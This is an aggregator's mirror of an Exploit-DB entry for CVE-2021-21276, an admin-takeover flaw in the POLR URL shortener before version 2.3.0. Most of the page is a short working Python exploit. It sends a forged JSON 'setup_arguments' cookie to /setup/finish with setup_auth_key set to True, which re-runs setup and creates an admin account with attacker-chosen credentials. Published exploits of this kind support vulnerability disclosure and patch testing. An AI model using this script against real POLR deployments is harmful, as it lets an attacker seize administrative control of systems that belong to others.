5

[webapps] POLR URL 2.3.0 - Shortener Admin Takeover

 1 year ago
source link: https://www.exploit-db.com/exploits/51277
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

POLR URL 2.3.0 - Shortener Admin Takeover

EDB-ID:

51277

EDB Verified:


Exploit:

  /  

Platform:

PHP

Date:

2023-04-06

Vulnerable App:

# Exploit Title: POLR URL 2.3.0 - Shortener Admin Takeover
# Date: 2021-02-01
# Exploit Author: p4kl0nc4t <me-at-lcat-dot-dev>
# Vendor Homepage: -
# Software Link: https://github.com/cydrobolt/polr
# Version: < 2.3.0
# Tested on: Linux
# CVE : CVE-2021-21276


import json

import requests

payload = {
    'acct_username': 'admin',
    'acct_password': 'password',
    'acct_email': '[email protected]',
    'setup_auth_key': True,
}

r = requests.get('http://localhost/setup/finish',
                 cookies={'setup_arguments': json.dumps(payload)})
print(r.text)
            

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK